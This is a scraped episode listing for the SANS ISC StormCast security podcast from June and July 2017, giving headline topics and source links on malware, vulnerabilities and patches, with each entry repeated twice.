Detect SMB Versions with nmap https://isc.sans.edu/forums/diary/Rooting+Out+Hosts+that+Support+Older+Samba+Versions/22672/ CopyFish Google Chrome Extension Replaced by Adware https://a9t9.com/blog/chrome-extension-adware/ StartCom Applying to be Included in Mozilla SSL CAs again https://bugzilla.mozilla.org/show_bug.cgi?id=1311832#c12 McAffee Uses Mixed SSL/nonSSL Content For Online Malware Scan https://blogs.securiteam.com/index.php/archives/3350 Netflix Releases DoS Testing Tool https://medium.com/netflix-techblog/starting-the-avalanche-640e69b14a06
8/2/20176 minutes, 18 seconds
Episode Artwork

ISC StormCast for Wednesday, August 2nd 2017

Detect SMB Versions with nmap https://isc.sans.edu/forums/diary/Rooting+Out+Hosts+that+Support+Older+Samba+Versions/22672/ CopyFish Google Chrome Extension Replaced by Adware https://a9t9.com/blog/chrome-extension-adware/ StartCom Applying to be Included in Mozilla SSL CAs again https://bugzilla.mozilla.org/show_bug.cgi?id=1311832#c12 McAffee Uses Mixed SSL/nonSSL Content For Online Malware Scan https://blogs.securiteam.com/index.php/archives/3350 Netflix Releases DoS Testing Tool https://medium.com/netflix-techblog/starting-the-avalanche-640e69b14a06
8/2/20176 minutes, 18 seconds
Episode Artwork

ISC StormCast for Tuesday, August 1st 2017

MSFT Re-Releases June Outlook Update https://support.office.com/en-us/article/Outlook-known-issues-in-the-June-2017-security-updates-3f6dbffd-8505-492d-b19f-b3b89369ed9b?ui=en-US&rs=en-US&ad=US&fromAR=1 Iranian Hackers Use Social Media To Collect Data https://www.darkreading.com/attacks-breaches/iranian-hackers-ensnared-targets-via-phony-female-photographer/d/d-id/1329502?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple ShieldFS Self Healing Filesystem http://shieldfs.necst.it/continella-shieldfs-2016.pdf
8/1/20175 minutes, 40 seconds
Episode Artwork

ISC StormCast for Tuesday, August 1st 2017

MSFT Re-Releases June Outlook Update https://support.office.com/en-us/article/Outlook-known-issues-in-the-June-2017-security-updates-3f6dbffd-8505-492d-b19f-b3b89369ed9b?ui=en-US&rs=en-US&ad=US&fromAR=1 Iranian Hackers Use Social Media To Collect Data https://www.darkreading.com/attacks-breaches/iranian-hackers-ensnared-targets-via-phony-female-photographer/d/d-id/1329502?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple ShieldFS Self Healing Filesystem http://shieldfs.necst.it/continella-shieldfs-2016.pdf
8/1/20175 minutes, 40 seconds
Episode Artwork

ISC StormCast for Monday, July 31st 2017

SMBloris DoS Attack Locks Up Windows https://twitter.com/jennamagius/status/891434286212984832 https://isc.sans.edu/forums/diary/SMBLoris+the+new+SMB+flaw/22662/ Text Banking Attacks https://isc.sans.edu/forums/diary/Text+Banking+Scams/22666/ Nissan Leaf WiFi Vulnerability https://github.com/HackingThings/Publications/blob/cdb72df7c3feffd02593a31d67a34ae353b09114/2017/DC25_Driving%20down%20the%20rabbit%20hole-Mickey_Jesse_Oleksander.pdf
7/31/20175 minutes, 48 seconds
Episode Artwork

ISC StormCast for Monday, July 31st 2017

SMBloris DoS Attack Locks Up Windows https://twitter.com/jennamagius/status/891434286212984832 https://isc.sans.edu/forums/diary/SMBLoris+the+new+SMB+flaw/22662/ Text Banking Attacks https://isc.sans.edu/forums/diary/Text+Banking+Scams/22666/ Nissan Leaf WiFi Vulnerability https://github.com/HackingThings/Publications/blob/cdb72df7c3feffd02593a31d67a34ae353b09114/2017/DC25_Driving%20down%20the%20rabbit%20hole-Mickey_Jesse_Oleksander.pdf
7/31/20175 minutes, 48 seconds
Episode Artwork

ISC StormCast for Friday, July 28th 2017

Targeting HTTP's Hidden Attack-Surface http://blog.portswigger.net/2017/07/cracking-lens-targeting-https-hidden.html Petya/Goldeneye Decrypter https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/ TinyPot, My Small Honeypot https://isc.sans.edu/forums/diary/TinyPot+My+Small+Honeypot/22654/ Shaun McCullough https://www.sans.org/reading-room/whitepapers/testing/docker-create-multi-container-environments-research-sharing-lateral-movement-37855
7/28/201713 minutes, 32 seconds
Episode Artwork

ISC StormCast for Friday, July 28th 2017

Targeting HTTP's Hidden Attack-Surface http://blog.portswigger.net/2017/07/cracking-lens-targeting-https-hidden.html Petya/Goldeneye Decrypter https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/ TinyPot, My Small Honeypot https://isc.sans.edu/forums/diary/TinyPot+My+Small+Honeypot/22654/ Shaun McCullough https://www.sans.org/reading-room/whitepapers/testing/docker-create-multi-container-environments-research-sharing-lateral-movement-37855
7/28/201713 minutes, 32 seconds
Episode Artwork

ISC StormCast for Thursday, July 27th 2017

Malspam Pushing Emotet Malware https://isc.sans.edu/forums/diary/Malspam+pushing+Emotet+malware/22650/ Broadpwn Released http://blog.exodusintel.com/2017/07/26/broadpwn/ Microsoft Announces Windows 10 Bug Bounty https://blogs.technet.microsoft.com/msrc/2017/07/26/announcing-the-windows-bounty-program/ Custom Map Vulnearbilty in Valve Games https://oneupsecurity.com/research/remote-code-execution-in-source-games
7/27/20175 minutes, 11 seconds
Episode Artwork

ISC StormCast for Thursday, July 27th 2017

Malspam Pushing Emotet Malware https://isc.sans.edu/forums/diary/Malspam+pushing+Emotet+malware/22650/ Broadpwn Released http://blog.exodusintel.com/2017/07/26/broadpwn/ Microsoft Announces Windows 10 Bug Bounty https://blogs.technet.microsoft.com/msrc/2017/07/26/announcing-the-windows-bounty-program/ Custom Map Vulnearbilty in Valve Games https://oneupsecurity.com/research/remote-code-execution-in-source-games
7/27/20175 minutes, 11 seconds
Episode Artwork

ISC StormCast for Wednesday, July 26th 2017

Adobe Announces End of Flash for 2020 https://blogs.adobe.com/conversations/2017/07/adobe-flash-update.html JA3 Hash To Fingerprint SSL/TLS Connections https://github.com/salesforce/ja3 https://engineering.salesforce.com/open-sourcing-ja3-92c9e53c3c41 New Wave of Apple iCloud Ransom Attacks https://www.heise.de/mac-and-i/meldung/Erneut-iCloud-Erpressungswelle-ueber-Meinen-Mac-suchen-und-Mein-iPhone-suchen-3782075.html
7/26/20175 minutes, 45 seconds
Episode Artwork

ISC StormCast for Wednesday, July 26th 2017

Adobe Announces End of Flash for 2020 https://blogs.adobe.com/conversations/2017/07/adobe-flash-update.html JA3 Hash To Fingerprint SSL/TLS Connections https://github.com/salesforce/ja3 https://engineering.salesforce.com/open-sourcing-ja3-92c9e53c3c41 New Wave of Apple iCloud Ransom Attacks https://www.heise.de/mac-and-i/meldung/Erneut-iCloud-Erpressungswelle-ueber-Meinen-Mac-suchen-und-Mein-iPhone-suchen-3782075.html
7/26/20175 minutes, 45 seconds
Episode Artwork

ISC StormCast for Tuesday, July 25th 2017

Uber Drivers Targeted in Social Engineering Scam https://isc.sans.edu/forums/diary/Uber+drivers+new+threat+the+passenger/22626/ Mac Malware FruitFly2 https://motherboard.vice.com/en_us/article/zmv79w/mysterious-mac-malware-has-infected-hundreds-of-victims-for-years Exploit Released for Critical Netscaler SD WAN 9.1.2 Vulnerability http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-6316
7/25/20177 minutes, 15 seconds
Episode Artwork

ISC StormCast for Tuesday, July 25th 2017

Uber Drivers Targeted in Social Engineering Scam https://isc.sans.edu/forums/diary/Uber+drivers+new+threat+the+passenger/22626/ Mac Malware FruitFly2 https://motherboard.vice.com/en_us/article/zmv79w/mysterious-mac-malware-has-infected-hundreds-of-victims-for-years Exploit Released for Critical Netscaler SD WAN 9.1.2 Vulnerability http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-6316
7/25/20177 minutes, 15 seconds
Episode Artwork

ISC StormCast for Monday, July 24th 2017

Malicious .iso Attachments https://isc.sans.edu/forums/diary/Malicious+iso+Attachments/22636/ Maldoc with .lnk File https://isc.sans.edu/forums/diary/Another+lnk+File/22640/ Large Ethereum Hack http://hackingdistributed.com/2017/07/22/deep-dive-parity-bug/
7/24/20175 minutes, 2 seconds
Episode Artwork

ISC StormCast for Monday, July 24th 2017

Malicious .iso Attachments https://isc.sans.edu/forums/diary/Malicious+iso+Attachments/22636/ Maldoc with .lnk File https://isc.sans.edu/forums/diary/Another+lnk+File/22640/ Large Ethereum Hack http://hackingdistributed.com/2017/07/22/deep-dive-parity-bug/
7/24/20175 minutes, 2 seconds
Episode Artwork

ISC StormCast for Friday, July 21st 2017

Symantec Sloppy Key Verification Leads To Revocation of Certificates https://blog.hboeck.de/archives/888-How-I-tricked-Symantec-with-a-Fake-Private-Key.html Gnome Thumbnailer Executes Code http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html
7/21/201711 minutes
Episode Artwork

ISC StormCast for Friday, July 21st 2017

Symantec Sloppy Key Verification Leads To Revocation of Certificates https://blog.hboeck.de/archives/888-How-I-tricked-Symantec-with-a-Fake-Private-Key.html Gnome Thumbnailer Executes Code http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html
7/21/201711 minutes
Episode Artwork

ISC StormCast for Thursday, July 20th 2017

Bots Searching for Keys and Config Files https://isc.sans.edu/forums/diary/Bots+Searching+for+Keys+Config+Files/22630/ Apple Updates Everything https://support.apple.com/en-us/HT201222 Trend Micro Sees SambaCry Exploits http://blog.trendmicro.com/trendlabs-security-intelligence/linux-users-urged-update-new-threat-exploits-sambacry/ Google Increases Developer Scrutiny https://developers.googleblog.com/2017/05/updating-developer-identity-guidelines.html
7/20/20176 minutes, 1 second
Episode Artwork

ISC StormCast for Thursday, July 20th 2017

Bots Searching for Keys and Config Files https://isc.sans.edu/forums/diary/Bots+Searching+for+Keys+Config+Files/22630/ Apple Updates Everything https://support.apple.com/en-us/HT201222 Trend Micro Sees SambaCry Exploits http://blog.trendmicro.com/trendlabs-security-intelligence/linux-users-urged-update-new-threat-exploits-sambacry/ Google Increases Developer Scrutiny https://developers.googleblog.com/2017/05/updating-developer-identity-guidelines.html
7/20/20176 minutes, 1 second
Episode Artwork

ISC StormCast for Wednesday, July 19th 2017

Oracle Quarterly Critical Patch Update http://www.oracle.com/technetwork/security-advisory/cpujul2017verbose-3236625.html Cisco WebEx Plugin Update https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170717-webex https://bugs.chromium.org/p/project-zero/issues/detail?id=1324&desc=2 Node.JS DoS Vulnerability https://nodejs.org/en/blog/vulnerability/july-2017-security-releases/ Bitdefender Remote Stack Buffer Overflow https://landave.io/2017/07/bitdefender-remote-stack-buffer-overflow-via-7z-ppmd/ Coindash Hack https://twitter.com/coindashio/status/886936799695818752 https://www.coindash.io DowJones Leaks Customer Data via S3 Buckets https://www.upguard.com/breaches/cloud-leak-dow-jones
7/19/20175 minutes, 46 seconds
Episode Artwork

ISC StormCast for Wednesday, July 19th 2017

Oracle Quarterly Critical Patch Update http://www.oracle.com/technetwork/security-advisory/cpujul2017verbose-3236625.html Cisco WebEx Plugin Update https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170717-webex https://bugs.chromium.org/p/project-zero/issues/detail?id=1324&desc=2 Node.JS DoS Vulnerability https://nodejs.org/en/blog/vulnerability/july-2017-security-releases/ Bitdefender Remote Stack Buffer Overflow https://landave.io/2017/07/bitdefender-remote-stack-buffer-overflow-via-7z-ppmd/ Coindash Hack https://twitter.com/coindashio/status/886936799695818752 https://www.coindash.io DowJones Leaks Customer Data via S3 Buckets https://www.upguard.com/breaches/cloud-leak-dow-jones
7/19/20175 minutes, 46 seconds
Episode Artwork

ISC StormCast for Tuesday, July 18th 2017

SMS Phishing Asks Victims to Upload Picture of Token Card https://isc.sans.edu/forums/diary/SMS+Phishing+induces+victims+to+photograph+its+own+token+card/22616/ Critical FreeRADIUS Update https://guidovranken.wordpress.com/2017/07/17/11-remote-vulnerabilities-inc-2x-rce-in-freeradius-packet-parsers/ OS X Malware Installs Crypto Messenger Signal https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/
7/18/20175 minutes, 45 seconds
Episode Artwork

ISC StormCast for Tuesday, July 18th 2017

SMS Phishing Asks Victims to Upload Picture of Token Card https://isc.sans.edu/forums/diary/SMS+Phishing+induces+victims+to+photograph+its+own+token+card/22616/ Critical FreeRADIUS Update https://guidovranken.wordpress.com/2017/07/17/11-remote-vulnerabilities-inc-2x-rce-in-freeradius-packet-parsers/ OS X Malware Installs Crypto Messenger Signal https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/
7/18/20175 minutes, 45 seconds
Episode Artwork

ISC StormCast for Monday, July 17th 2017

NemucodAES UPS Malspam https://isc.sans.edu/forums/diary/NemucodAES+and+the+malspam+that+distributes+it/22614/ Analyzing Malicious Office Document With LNK https://isc.sans.edu/forums/diary/Office+maldoc+lnk/22618/ Gandi Breach Leads to Domain Compromise https://news.gandi.net/en/2017/07/detailed-incident-report/ iSmart Alarm Vulnerabilities http://dojo.bullguard.com/blog/burglar-hacker-when-a-physical-security-is-compromised-by-iot-vulnerabilities/
7/17/20175 minutes, 25 seconds
Episode Artwork

ISC StormCast for Monday, July 17th 2017

NemucodAES UPS Malspam https://isc.sans.edu/forums/diary/NemucodAES+and+the+malspam+that+distributes+it/22614/ Analyzing Malicious Office Document With LNK https://isc.sans.edu/forums/diary/Office+maldoc+lnk/22618/ Gandi Breach Leads to Domain Compromise https://news.gandi.net/en/2017/07/detailed-incident-report/ iSmart Alarm Vulnerabilities http://dojo.bullguard.com/blog/burglar-hacker-when-a-physical-security-is-compromised-by-iot-vulnerabilities/
7/17/20175 minutes, 25 seconds
Episode Artwork

ISC StormCast for Friday, July 14th 2017

Malware Loads ffmpeg For Video Recording Features https://blog.malwarebytes.com/threat-analysis/2017/07/malware-abusing-ffmpeg/ Password Managers and Cloud Storage https://discussions.agilebits.com/discussion/76956/can-i-still-buy-standalone-license-for-the-1password-no-longer-being-marketed/p8 SAP Point of Sales Express Patch https://erpscan.com/press-center/blog/sap-cyber-threat-intelligence-report-july-2017/ Roderick Currie: Car Hacking Developments https://www.sans.org/reading-room/whitepapers/internet/developments-car-hacking-36607
7/13/201714 minutes, 56 seconds
Episode Artwork

ISC StormCast for Friday, July 14th 2017

Malware Loads ffmpeg For Video Recording Features https://blog.malwarebytes.com/threat-analysis/2017/07/malware-abusing-ffmpeg/ Password Managers and Cloud Storage https://discussions.agilebits.com/discussion/76956/can-i-still-buy-standalone-license-for-the-1password-no-longer-being-marketed/p8 SAP Point of Sales Express Patch https://erpscan.com/press-center/blog/sap-cyber-threat-intelligence-report-july-2017/ Roderick Currie: Car Hacking Developments https://www.sans.org/reading-room/whitepapers/internet/developments-car-hacking-36607
7/13/201714 minutes, 56 seconds
Episode Artwork

ISC StormCast for Thursday, July 13th 2017

Simple File Integrity Monitoring With Backup Scripts https://isc.sans.edu/forums/diary/Backup+Scripts+the+FIM+of+the+Poor/22606/ Ethereum Wallet Services Targeted By Scammers http://www.ibtimes.co.uk/ethereum-under-siege-scammers-make-700000-6-days-slack-reddit-phishing-attacks-1629866 MongoDB Security Surprises For Shared Hosting https://medium.com/@alexbyk/mongodb-at-shared-hosting-security-surprises-c441ecb84b54 Trend Micro Vulnerabilities https://www.coresecurity.com/advisories/trend-micro-deep-discovery-director-multiple-vulnerabilities
7/12/20175 minutes, 45 seconds
Episode Artwork

ISC StormCast for Thursday, July 13th 2017

Simple File Integrity Monitoring With Backup Scripts https://isc.sans.edu/forums/diary/Backup+Scripts+the+FIM+of+the+Poor/22606/ Ethereum Wallet Services Targeted By Scammers http://www.ibtimes.co.uk/ethereum-under-siege-scammers-make-700000-6-days-slack-reddit-phishing-attacks-1629866 MongoDB Security Surprises For Shared Hosting https://medium.com/@alexbyk/mongodb-at-shared-hosting-security-surprises-c441ecb84b54 Trend Micro Vulnerabilities https://www.coresecurity.com/advisories/trend-micro-deep-discovery-director-multiple-vulnerabilities
7/12/20175 minutes, 45 seconds
Episode Artwork

ISC StormCast for Wednesday, July 12th 2017

Microsoft Patch Tuesday https://isc.sans.edu/diary//22602 AT&T Cell Phone Takeover https://carpeaqua.com/2017/07/07/hack-the-planet/ Systemd Invalid Username Bug To Be Fixed https://github.com/systemd/systemd/pull/6300
7/11/20175 minutes, 33 seconds
Episode Artwork

ISC StormCast for Wednesday, July 12th 2017

Microsoft Patch Tuesday https://isc.sans.edu/diary//22602 AT&T Cell Phone Takeover https://carpeaqua.com/2017/07/07/hack-the-planet/ Systemd Invalid Username Bug To Be Fixed https://github.com/systemd/systemd/pull/6300
7/11/20175 minutes, 33 seconds
Episode Artwork

ISC StormCast for Tuesday, July 11th 2017

Takeover of .io TLD https://thehackerblog.com/the-io-error-taking-control-of-all-io-domains-with-a-targeted-registration/ Malwarebytes Quarterly Malware Report https://www.malwarebytes.com/pdf/white-papers/CybercrimeTacticsAndTechniques-Q2-2017.pdf OpenBSD Introducing KARL To Randomize Kernel Layout at Boot https://marc.info/?l=openbsd-tech&m=149732026405941&w=2
7/10/20175 minutes, 39 seconds
Episode Artwork

ISC StormCast for Tuesday, July 11th 2017

Takeover of .io TLD https://thehackerblog.com/the-io-error-taking-control-of-all-io-domains-with-a-targeted-registration/ Malwarebytes Quarterly Malware Report https://www.malwarebytes.com/pdf/white-papers/CybercrimeTacticsAndTechniques-Q2-2017.pdf OpenBSD Introducing KARL To Randomize Kernel Layout at Boot https://marc.info/?l=openbsd-tech&m=149732026405941&w=2
7/10/20175 minutes, 39 seconds
Episode Artwork

ISC StormCast for Monday, July 10th 2017

More DDoS Ransom Demands https://isc.sans.edu/forums/diary/Adversary+hunting+with+SOFELK/22592/ Adversary Hunting With SOF-ELK https://isc.sans.edu/forums/diary/Adversary+hunting+with+SOFELK/22592/ Petya Master Key Published https://twitter.com/JanusSecretary/status/882663988429021184?ref_src=twsrc%5Etfw&ref_url=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Fauthor-of-original-petya-ransomware-publishes-master-decryption-key%2F Template Attacks Against Critical Infrastructure http://blog.talosintelligence.com/2017/07/template-injection.html
7/9/20175 minutes, 56 seconds
Episode Artwork

ISC StormCast for Monday, July 10th 2017

More DDoS Ransom Demands https://isc.sans.edu/forums/diary/Adversary+hunting+with+SOFELK/22592/ Adversary Hunting With SOF-ELK https://isc.sans.edu/forums/diary/Adversary+hunting+with+SOFELK/22592/ Petya Master Key Published https://twitter.com/JanusSecretary/status/882663988429021184?ref_src=twsrc%5Etfw&ref_url=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Fauthor-of-original-petya-ransomware-publishes-master-decryption-key%2F Template Attacks Against Critical Infrastructure http://blog.talosintelligence.com/2017/07/template-injection.html
7/9/20175 minutes, 56 seconds
Episode Artwork

ISC StormCast for Friday, July 7th 2017

Finding Odd Domain Names https://isc.sans.edu/forums/diary/Selecting+domains+with+random+names/22580/ BitTorrent Sync 2.0 Log Files https://isc.sans.edu/forums/diary/Investigation+of+BitTorrent+Sync+v20+as+a+P2P+Cloud+Service+Part+2+Log+Files+artefacts/22582/ Cisco Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170705-esc2 Finding Weak Password Hashing Algorithms Via Hash Collisions https://www.netsparker.com/blog/web-security/collision-based-hashing-algorithm-disclosure/ BIND TSIG Exploit http://www.synacktiv.ninja/ressources/CVE-2017-3143_BIND9_TSIG_dynamic_updates_vulnerability_Synacktiv.pdf
7/6/20175 minutes, 32 seconds
Episode Artwork

ISC StormCast for Friday, July 7th 2017

Finding Odd Domain Names https://isc.sans.edu/forums/diary/Selecting+domains+with+random+names/22580/ BitTorrent Sync 2.0 Log Files https://isc.sans.edu/forums/diary/Investigation+of+BitTorrent+Sync+v20+as+a+P2P+Cloud+Service+Part+2+Log+Files+artefacts/22582/ Cisco Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170705-esc2 Finding Weak Password Hashing Algorithms Via Hash Collisions https://www.netsparker.com/blog/web-security/collision-based-hashing-algorithm-disclosure/ BIND TSIG Exploit http://www.synacktiv.ninja/ressources/CVE-2017-3143_BIND9_TSIG_dynamic_updates_vulnerability_Synacktiv.pdf
7/6/20175 minutes, 32 seconds
Episode Artwork

ISC StormCast for Thursday, July 6th 2017

AVTest Report: Ransomware not a big deal; Android/MacOS Catching up to Windows https://www.av-test.org/fileadmin/pdf/security_report/AV-TEST_Security_Report_2016-2017.pdf Microsoft Will Prompt Users to Update Windows 10 https://support.microsoft.com/en-us/help/4023814 Bithumb Bitcoin Exchange Hacked (Article in Korean) http://bithumb.cafe/archives/7329 Turkish Airlines and Emirates Remove Laptop Ban http://www.theregister.co.uk/2017/07/05/emirates_and_turkish_airlines_lift_laptop_ban_on_us_flights/ Ukrainian Authorities Raid MeDoc (Article in Ukrainian) https://cyberpolice.gov.ua/news/prykryttyam-najmasshtabnishoyi-kiberataky-v-istoriyi-ukrayiny-stav-virus-diskcoderc-881/
7/5/20174 minutes, 50 seconds
Episode Artwork

ISC StormCast for Thursday, July 6th 2017

AVTest Report: Ransomware not a big deal; Android/MacOS Catching up to Windows https://www.av-test.org/fileadmin/pdf/security_report/AV-TEST_Security_Report_2016-2017.pdf Microsoft Will Prompt Users to Update Windows 10 https://support.microsoft.com/en-us/help/4023814 Bithumb Bitcoin Exchange Hacked (Article in Korean) http://bithumb.cafe/archives/7329 Turkish Airlines and Emirates Remove Laptop Ban http://www.theregister.co.uk/2017/07/05/emirates_and_turkish_airlines_lift_laptop_ban_on_us_flights/ Ukrainian Authorities Raid MeDoc (Article in Ukrainian) https://cyberpolice.gov.ua/news/prykryttyam-najmasshtabnishoyi-kiberataky-v-istoriyi-ukrayiny-stav-virus-diskcoderc-881/
7/5/20174 minutes, 50 seconds
Episode Artwork

ISC StormCast for Wednesday, July 5th 2017

Microsoft Patches Skype Vulnerability https://www.vulnerability-lab.com/get_content.php?id=2071 SystemD Invalid Username Bug Not Considered a Vulnerability (or Bug) https://github.com/systemd/systemd/issues/6237 Cisco Fixes SNMP Vulnerability in IOS and IOS XE https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170629-snmp Smartphones Can Be Compromised with shady replacement parts https://iss.oy.ne.ro/Shattered Siemens Fixes Intel AMT Bug https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-874235.pdf Update For libgcrypt https://www.ubuntuupdates.org/package/core/zesty/main/updates/libgcrypt20-dev
7/4/20175 minutes, 55 seconds
Episode Artwork

ISC StormCast for Wednesday, July 5th 2017

Microsoft Patches Skype Vulnerability https://www.vulnerability-lab.com/get_content.php?id=2071 SystemD Invalid Username Bug Not Considered a Vulnerability (or Bug) https://github.com/systemd/systemd/issues/6237 Cisco Fixes SNMP Vulnerability in IOS and IOS XE https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170629-snmp Smartphones Can Be Compromised with shady replacement parts https://iss.oy.ne.ro/Shattered Siemens Fixes Intel AMT Bug https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-874235.pdf Update For libgcrypt https://www.ubuntuupdates.org/package/core/zesty/main/updates/libgcrypt20-dev
7/4/20175 minutes, 55 seconds
Episode Artwork

ISC StormCast for Friday, June 30th 2017

Catching up With Blank Slate https://isc.sans.edu/forums/diary/Catching+up+with+Blank+Slate+a+malspam+campaign+still+going+strong/22570/ Azure AD Connect Vulnerability https://technet.microsoft.com/library/security/4033453.aspx#ID0EN Exploit Available For Stack Clash Vulnerability https://www.qualys.com/research/security-advisories/ Paul Herschberger: Data Breach Impact Estimation https://www.sans.org/reading-room/whitepapers/dlp/data-breach-impact-estimation-37502
6/30/201715 minutes, 7 seconds
Episode Artwork

ISC StormCast for Friday, June 30th 2017

Catching up With Blank Slate https://isc.sans.edu/forums/diary/Catching+up+with+Blank+Slate+a+malspam+campaign+still+going+strong/22570/ Azure AD Connect Vulnerability https://technet.microsoft.com/library/security/4033453.aspx#ID0EN Exploit Available For Stack Clash Vulnerability https://www.qualys.com/research/security-advisories/ Paul Herschberger: Data Breach Impact Estimation https://www.sans.org/reading-room/whitepapers/dlp/data-breach-impact-estimation-37502
6/30/201715 minutes, 7 seconds
Episode Artwork

ISC StormCast for Thursday, June 29th 2017

Petya Ransomware Update https://isc.sans.edu/forums/diary/Petya+I+hardly+know+ya+an+ISC+update+on+the+20170627+ransomware+outbreak/22566/ Ubuntu systemd Vulnerability https://www.ubuntu.com/usn/usn-3341-1/ Microsoft Will Include EMET in Windows 10 https://blogs.technet.microsoft.com/mmpc/2017/06/27/whats-new-in-windows-defender-atp-fall-creators-update/ BGB Attacks Against Bitcoin https://blog.acolyer.org/2017/06/27/hijacking-bitcoin-routing-attacks-on-cryptocurrencies/
6/29/20175 minutes, 37 seconds
Episode Artwork

ISC StormCast for Thursday, June 29th 2017

Petya Ransomware Update https://isc.sans.edu/forums/diary/Petya+I+hardly+know+ya+an+ISC+update+on+the+20170627+ransomware+outbreak/22566/ Ubuntu systemd Vulnerability https://www.ubuntu.com/usn/usn-3341-1/ Microsoft Will Include EMET in Windows 10 https://blogs.technet.microsoft.com/mmpc/2017/06/27/whats-new-in-windows-defender-atp-fall-creators-update/ BGB Attacks Against Bitcoin https://blog.acolyer.org/2017/06/27/hijacking-bitcoin-routing-attacks-on-cryptocurrencies/
6/29/20175 minutes, 37 seconds
Episode Artwork

ISC StormCast for Wednesday, June 28th 2017

Petya/Goldeneye Variant Makes the Rounds https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/
6/28/20175 minutes, 7 seconds
Episode Artwork

ISC StormCast for Wednesday, June 28th 2017

Petya/Goldeneye Variant Makes the Rounds https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/
6/28/20175 minutes, 7 seconds
Episode Artwork

ISC StormCast for Tuesday, June 27th 2017

Investigation of BitTorrent Sync (v.2.0) as a P2P Cloud (Part 1) https://isc.sans.edu/forums/diary/Investigation+of+BitTorrent+Sync+v20+as+a+P2P+Cloud+Part+1/22554/ Ransomware Payment Spurres More DDoS Ransomware Attacks https://www.bleepingcomputer.com/news/security/-1-million-ransomware-payment-has-spurred-new-ddos-for-bitcoin-attacks/ Speed Trap Cameras in Australia Infected with WannaCrypt http://www.camerassavelives.vic.gov.au/utility/latest+news/investigation+underway+into+cameras+affected+by+software+virus More Vulnerablities in Windows Defender https://bugs.chromium.org/p/project-zero/issues/detail?id=1282&desc=2 npm Developer Accounts Reset After Password Reuse Discovery https://github.com/ChALkeR/notes/blob/master/Gathering-weak-npm-credentials.md
6/27/20176 minutes, 16 seconds
Episode Artwork

ISC StormCast for Tuesday, June 27th 2017

Investigation of BitTorrent Sync (v.2.0) as a P2P Cloud (Part 1) https://isc.sans.edu/forums/diary/Investigation+of+BitTorrent+Sync+v20+as+a+P2P+Cloud+Part+1/22554/ Ransomware Payment Spurres More DDoS Ransomware Attacks https://www.bleepingcomputer.com/news/security/-1-million-ransomware-payment-has-spurred-new-ddos-for-bitcoin-attacks/ Speed Trap Cameras in Australia Infected with WannaCrypt http://www.camerassavelives.vic.gov.au/utility/latest+news/investigation+underway+into+cameras+affected+by+software+virus More Vulnerablities in Windows Defender https://bugs.chromium.org/p/project-zero/issues/detail?id=1282&desc=2 npm Developer Accounts Reset After Password Reuse Discovery https://github.com/ChALkeR/notes/blob/master/Gathering-weak-npm-credentials.md
6/27/20176 minutes, 16 seconds
Episode Artwork

ISC StormCast for Monday, June 26th 2017

Fake DDoS Extortions Continue https://isc.sans.edu/forums/diary/Fake+DDoS+Extortions+Continue+Please+Forward+Us+Any+Threats+You+Have+Received/22550/ Traveling with a Laptop https://isc.sans.edu/forums/diary/Traveling+with+a+Laptop+Surviving+a+Laptop+Ban+How+to+Let+Go+of+Precious/22462/ Side Channel Attacks on the Cheap https://www.fox-it.com/nl/wp-content/uploads/sites/12/Tempest_attacks_against_AES.pdf Latest Locky Variant Hunting Down Windows XP Users http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html Windows Beta Builts and Source Code Leaked http://www.theregister.co.uk/2017/06/23/windows_10_leak/
6/25/20176 minutes, 36 seconds
Episode Artwork

ISC StormCast for Monday, June 26th 2017

Fake DDoS Extortions Continue https://isc.sans.edu/forums/diary/Fake+DDoS+Extortions+Continue+Please+Forward+Us+Any+Threats+You+Have+Received/22550/ Traveling with a Laptop https://isc.sans.edu/forums/diary/Traveling+with+a+Laptop+Surviving+a+Laptop+Ban+How+to+Let+Go+of+Precious/22462/ Side Channel Attacks on the Cheap https://www.fox-it.com/nl/wp-content/uploads/sites/12/Tempest_attacks_against_AES.pdf Latest Locky Variant Hunting Down Windows XP Users http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html Windows Beta Builts and Source Code Leaked http://www.theregister.co.uk/2017/06/23/windows_10_leak/
6/25/20176 minutes, 36 seconds
Episode Artwork

ISC StormCast for Friday, June 23rd 2017

Obfuscating Without XOR https://isc.sans.edu/forums/diary/Obfuscating+without+XOR/22544/ Airbnb OAUTH Token Theft https://www.arneswinnen.net/2017/06/authentication-bypass-on-airbnb-via-oauth-tokens-theft/ Critical Drupal Vulnerablity https://www.drupal.org/SA-CORE-2017-003 Auditing Docker Containers https://www.sans.org/reading-room/whitepapers/auditing/checklist-audit-docker-containers-37437
6/23/201711 minutes, 55 seconds
Episode Artwork

ISC StormCast for Friday, June 23rd 2017

Obfuscating Without XOR https://isc.sans.edu/forums/diary/Obfuscating+without+XOR/22544/ Airbnb OAUTH Token Theft https://www.arneswinnen.net/2017/06/authentication-bypass-on-airbnb-via-oauth-tokens-theft/ Critical Drupal Vulnerablity https://www.drupal.org/SA-CORE-2017-003 Auditing Docker Containers https://www.sans.org/reading-room/whitepapers/auditing/checklist-audit-docker-containers-37437
6/23/201711 minutes, 55 seconds
